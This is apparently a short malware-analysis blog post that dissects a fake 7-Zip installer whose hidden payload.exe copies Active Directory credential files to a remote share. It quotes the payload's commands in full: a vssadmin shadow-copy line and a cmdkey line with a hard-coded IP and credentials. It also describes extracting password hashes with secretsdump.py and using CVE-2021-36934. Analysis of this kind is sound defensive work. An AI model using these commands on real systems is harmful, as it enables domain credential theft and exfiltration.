Using 7-Zip to extract a fake 7-Zip installer
I stumbled upon an interesting file on Any.run. The file in question is bff1fc0a497f275c6caf0d87eb680dc807639c9e. It has the name 7z2409-x64.exe. If we dig a bit through the file, we can easily see that it’s actually a Nullsoft installer:
A quick search reveals that one way to extract the files inside is by using 7-Zip. Opening it reveals the real 7-Zip and a file called payload.exe.
Let’s analyze payload.exe. First thing we do is to check the strings:
Definitely not what you’d expect to see in a clean file. Let’s disassemble it and see what’s going on.
The WinMain function starts with a call to the system API to execute the command vssadmin create shadow /for=C: >nul 2>&1. This creates a shadow copy of the C: drive. This is usually done to make it easier to extract sensitive files.
Let’s analyze the code further:
Our assumption was correct. There are 4 more calls to the system API.
The first one uses cmdkey to to store (add) a network credential in the Windows Credential Manager. The command that will be executed looks like this:
cmdkey /add:192.76.28.19 /user:thr34t /pass:MyThreatPassword123+
Next, the malware tries to copy the files ntds.dit and SYSTEM to \\192.76.29.19\work\DC01 and after that deletes the saved credentials.
A whois 192.76.28.19 points us to a system which appears to belong to the University of Oxford.
Let’s see what are those files good for.
ntds.ditis the core database file for Active Directory Domain Services (AD DS) in Windows Server- SYSTEM is a registry hive. It can be used to decrypt the password hashes stored in ntds.dit.
From here it’s relatively easy to get those hashes. One example is by using secretsdump.py from Impacket.
Now, you may ask yourself how come everyone has access to these files? Well, usually regular users don’t. But that’s where CVE-2021-36934 comes into play (or another elevation of privilege vulnerability). That’s the reason some detections on VirusTotal point have this CVE in the name.
Hopefully you had fun reading this!